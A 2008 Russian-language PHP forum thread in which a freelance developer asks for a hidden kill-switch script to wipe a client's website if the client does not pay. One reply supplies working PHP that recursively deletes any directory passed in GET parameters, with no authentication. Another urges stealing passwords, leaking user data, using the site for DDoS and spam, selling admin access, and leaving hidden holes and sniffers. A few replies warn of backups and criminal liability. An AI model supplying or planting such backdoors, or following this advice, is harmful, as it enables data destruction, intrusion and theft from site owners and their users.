kill you!

Тема в разделе "PHP", создана пользователем t0wer, 4 окт 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. t0wer

    t0wer BlackHerald

    Регистр.:
    24 июн 2008
    Сообщения:
    731
    Симпатии:
    421
    Всем доброго дня!

    Я делаю сайтик для одной конторы через инет, но боюсь (есть небольшая такая вероятность) что товарищи кинут с бабками! Есть доступ к сайту для размешения скриптов. Есть у кого скриптик, при обращении к которому гет запросом будет выдаваться форма при введению в которую заветного слова с сайта (в рутовой папке public_html) будут киллится все папки и файлы!!! Хостинг от Агавы.

    Нужно срочно! Спасибо!
     
  2. imm

    imm

    Регистр.:
    17 июл 2007
    Сообщения:
    195
    Симпатии:
    30
    =)

    Зачем тебе такой головняк. Делай на своем хосте, посмотрят, согласятся отдашь исходники. :) Они же его слить могут, а потом найти скрипт в коде.
     
  3. megadude

    megadude

    Регистр.:
    6 сен 2006
    Сообщения:
    184
    Симпатии:
    65
    Тоже было актуально пару месяцев назад :D Только я килял не все файлы, а определенные папки с их содержимым(ЦСС, темплиты Смарти) :) Вот скриптик:
    PHP:
    <?php
    // $dir = the target directory
    // $DeleteMe = if true delete also $dir, if false leave it alone
    // GET must be like page.php?delete=delete&dir=css$deleteme=true

    if ($_GET['delete']=='delete' && $_GET['dir']!='' && $_GET['deleteme']!='') {
      
    $dir $_GET['dir'];
      
    $DeleteMe $_GET['deleteme'];
      
      
    SureRemoveDir($dir$DeleteMe)
    }

    function 
    SureRemoveDir($dir$DeleteMe) {
        if(!
    $dh = @opendir($dir)) return;
        while (
    false !== ($obj readdir($dh))) {
            if(
    $obj=='.' || $obj=='..') continue;
            if (!@
    unlink($dir.'/'.$obj)) SureRemoveDir($dir.'/'.$objtrue);
        }

        
    closedir($dh);
        if (
    $DeleteMe){
            @
    rmdir($dir);
        }
    }
    ?>
     
  4. PHP_Master

    PHP_Master

    Регистр.:
    3 фев 2008
    Сообщения:
    2.647
    Симпатии:
    590
    Бред.
    Ну кильнёш ты файло, а что толку? Элементарно восстановят из бэкапа.
    А если файло заливалось по FTP, а PHP установлен как mod_php? есть вероятность, что кильнуть файло не дадут.

    Добавлено через 1 минуту
    Нормальный вариант описан в посте #2.
     
  5. DIAgen

    DIAgen Постоялец

    Регистр.:
    30 окт 2006
    Сообщения:
    134
    Симпатии:
    72
    Зазенди скрипты и в них пропиши привязку на адрес сайт и на время работы по дате.
     
  6. Ser Frood

    Ser Frood Заблокирован

    Регистр.:
    12 дек 2006
    Сообщения:
    522
    Симпатии:
    386
    Ты забыл что существует дезенд)))) лучше заинкубить, на него тяжелее найти раскодировщик)
     
  7. KillDead

    KillDead

    Регистр.:
    11 авг 2006
    Сообщения:
    883
    Симпатии:
    540
    Если нормально настроен бэк, то от кила мало толку, хотя шороху наведёшь;) Но только один раз. Не думаю что после такого скрипт опять поставят.
    Что ещё Можно сделать- утянуть пароли и:

    -сливать контент, мыла, информацию юзеров.
    -Использовать сайт для ддоса , брута, спама.
    Может сможешь не только окупить, но и сверху что-то накапает.
    -Если лень или нет возможности то можно продать админ-доступ опытному челу по цене за скрипт.:D
    Да, ещё лучше оставлять нескольно таких дырок|сниферов|килов , может заказчит ждёт что-то подобное.
     
  8. vave

    vave

    Регистр.:
    23 июн 2007
    Сообщения:
    364
    Симпатии:
    14
    используешь фрэйм, заходят на свой адресс а на самом деле под ним страница на твоём хостинге, клиенты обычно глупые в этом плане:)
     
  9. ashotik

    ashotik

    Регистр.:
    7 авг 2008
    Сообщения:
    176
    Симпатии:
    20
    1) Удаляя файл через дырку ты автоматом становишься преступником по соотвествующим статьям УК, при большом желании терпил ты 100%-но получишь судимость.

    2) С дезендом никто связываться не будет, ибо если бы мог то клиент сам бы написал себе все.

    3) Имхо Зенд самый нормальный вариант, ставь срок неделю на основные либы и успокойся.

    4) В идеале конечно свой хостинг
     
  10. RolCom

    RolCom

    Регистр.:
    12 мар 2008
    Сообщения:
    351
    Симпатии:
    108
    Если ТС могут кинуть, то соответственно и договор устный, следовательно ни че не докажут.
     
Статус темы:
Закрыта.